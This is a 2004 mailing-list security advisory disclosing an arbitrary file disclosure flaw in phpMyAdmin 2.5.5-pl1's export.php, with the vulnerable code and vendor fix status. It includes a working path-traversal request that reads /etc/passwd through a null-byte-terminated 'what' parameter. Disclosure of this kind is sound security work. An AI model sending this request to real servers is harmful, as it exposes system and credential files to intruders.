Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior

From: Cedric Cochin (cco_at_netvigilance.com)
Date: 02/03/04

  • Next message: Joseph S. Myers: "Re: Symlink Vulnerability in GNU libtool <1.5.2"
    Date: Tue, 3 Feb 2004 11:28:57 +0100
    To: submissions@packetstormsecurity.org, vuln@secunia.com, news@securiteam.com, bugtraq@securityfocus.com, bugs@securitytracker.com
    
    

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

       Arbitrary File Disclosure Vulnerability in phpMyAdmin 2.5.5-pl1 and prior

    ################################################################################
    Summary :

    phpMyAdmin is a tool written in PHP intended to handle the administration of
    MySQL over the WWW. There is a vulnerability in the current stable version of
    phpMyAdmin that allows an attacker to retrieve arbitrary files from the
    webserver with privileges of the webserver..

    ################################################################################
    Details :

    The export PHP script can be exploited to disclose arbitrary file using a
    include() PHP call.

    Vulnerable Systems:
    * phpMyAdmin 2.5.5-pl1 and prior

    Release Date :
    February 2, 2004

    Severity :
    HIGH

    ################################################################################
    Examples :

                      -------------------------------------------

    I - Arbitrary File Disclosure
    (HIGH Risk)

    File impacted : export.php

    14:// What type of export are we doing?
    15:if ($what == 'excel') {
    16: $type = 'csv';
    17:} else {
    18: $type = $what;
    19:}
    20:
    21:/**
    22: * Defines the url to return to in case of error in a sql statement
    23: */
    24:require('./libraries/export/' . $type . '.php');

    Exploit example:

    - -- HTTP Request --

    http://[target]/[phpMyAdmin_directory]/export.php?what=../../../../../../etc/passwd%00

    - -- HTTP Request --

    The vulnerability is available evenif PHP register_globals is set to off.

    ################################################################################
    Vendor Status :

    The information has been provided to the phpMyAdmin Project Managers.
    A new release candidate 2.5.6-rc1 with fixes for this vulnerability is available.
    - --> http://www.phpmyadmin.net/home_page/
    - --> http://www.phpmyadmin.net/home_page/relnotes.php?rel=0

    ################################################################################
    Credit :

    Cedric Cochin, Security Engineer, netVigilance, Inc. (www.netvigilance.com)
    < cco@netvigilance.com >

    -----BEGIN PGP SIGNATURE-----
    Version: GnuPG v1.0.6 (GNU/Linux)
    Comment: For info see http://www.gnupg.org

    iD8DBQFAH3dJA9/8vqmWoYQRAjNoAJ4pGgoQBT9WoyPmbfw4h/6LkcjR6wCeNBj2
    ekO25itz2ssIvwgf2WRb/4k=
    =Yuh1
    -----END PGP SIGNATURE-----


  • Next message: Joseph S. Myers: "Re: Symlink Vulnerability in GNU libtool <1.5.2"